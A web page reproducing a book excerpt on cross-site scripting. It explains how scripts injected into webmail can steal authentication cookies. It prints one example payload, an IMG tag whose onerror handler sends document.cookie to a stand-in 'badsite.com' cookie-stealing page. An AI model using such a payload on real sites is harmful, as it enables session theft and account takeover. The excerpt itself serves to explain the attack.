Call now: (800) 766-1884  



 Home


 SQL Server Tips
 SQL Server Training

 SQL Server Consulting
 SQL Server Support
 SQL Server Remote DBA



 Articles
 Services
 SQL Server Scripts
 Scripts Menu



 

 

 

   
  SQL Server Tips by Gama and Naughter


Cross-site scripting (XSS)

 

Cross-site scripting consists of inserting script code (usually Javascript or VBScript) or calling malicious Java applets, ActiveX or Flash. This will occur in a hyperlink, a frame or iframe, a variable on a CGI, the input of a web application or any other technique that allows code from one site to be executed in another site. Sometimes this is called script injection, or “phishing” when the technique is aimed at stealing financial data by means of spoofed emails and fake websites or real websites with some script running in the background to steal passwords, spoofed web browser address bar, etc…

 

On certain webmail systems that allow HTML and run scripts without, it is possible to do a “cookie theft”. This happens because the script is running in the webmail site and it can read the authentication cookie from that site. With this cookie, an attacker can gain access to the email account. There are exploits that run silently and without the need of a user to click on a hyperlink, all that it takes is to open an email. This is an example:

 

<IMG width="0" height="0" onerror="window.open('http://www.badsite.com/ /cookieThief.asp?'+document.cookie);" src="::">

 

The onerror event handler will fire because the source for the image is invalid. This will open a window that will run an ASP page made with the sole purpose of taking the authentication cookie from that site and storing it. It might even have code to open a window and use that cookie to access the webmail account and change its password.
 


The above book excerpt is from:

Super SQL Server Systems
Turbocharge Database Performance with C++ External Procedures

ISBN: 0-9761573-2-2
Joseph Gama, P. J. Naughter

 http://www.rampant-books.com/book_2005_2_sql_server_external_procedures.htm
 

 

Burleson Consulting Remote DB Administration


 

 


 

 

 

 

 
Burleson is the America's Team

Note: The pages on this site were created as a support and training reference for use by our staff of DBA consultants.  If you find it confusing, please exit this page.

Errata?  SQL Server technology is changing and we strive to update our SQL Server support information.  If you find an error or have a suggestion for improving our content, we would appreciate your feedback.  Just  e-mail:and include the URL for the page.
 


Burleson Consulting
SQL Server database support

 

Copyright © 1996 -  2013 by Vaaltech Web Services. All rights reserved.

Hit Counter